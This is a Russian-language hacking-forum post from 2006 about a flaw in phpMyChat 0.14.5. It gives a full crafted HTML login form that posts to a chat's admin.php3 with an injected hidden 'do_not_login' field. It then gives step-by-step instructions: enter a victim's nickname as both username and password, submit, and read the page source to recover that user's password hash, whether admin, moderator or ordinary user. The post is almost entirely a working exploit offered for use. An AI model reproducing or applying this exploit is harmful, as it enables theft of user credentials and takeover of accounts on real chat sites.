Тема: уязвимость в phpMyChat 0.14.5
Показать сообщение отдельно

  #4  
Старый 03.04.2006, 09:18
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию
Мне стали задавать вопрос: «Как узнать хеш админа, если он не появляется в чате?".
Узнать можно. И не только админа, а можно и любого модера или юзера. Вот код страницы:
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">

<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
	window.focus();
	document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>

<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/admin.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<P><SPAN CLASS="error">Неправильный ник или пароль.</SPAN></P><INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
	<TD ALIGN="CENTER">
		<TABLE BORDER=0>
		<TR>
			<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Ник :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox">
			</TD>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox">
			</TD<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
		</TR>
		</TABLE>
		<P>
		<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
	</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>

</HTML>
В строчке <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= Пишем ник
В строчке <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= тоже пишем этот же ник. А не хеш.
Нажимаем "Вход" и видим, ник и пас в виде звездочек. Теперь просматриваем страницу в HTML и ищем строчку <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="342353564asas34523523" CLASS="ChatBox">
Теперь уже после VALUE= будет не ник, а хеш пользователя.
"The pirats of a network" www.pirats.jino-net.ru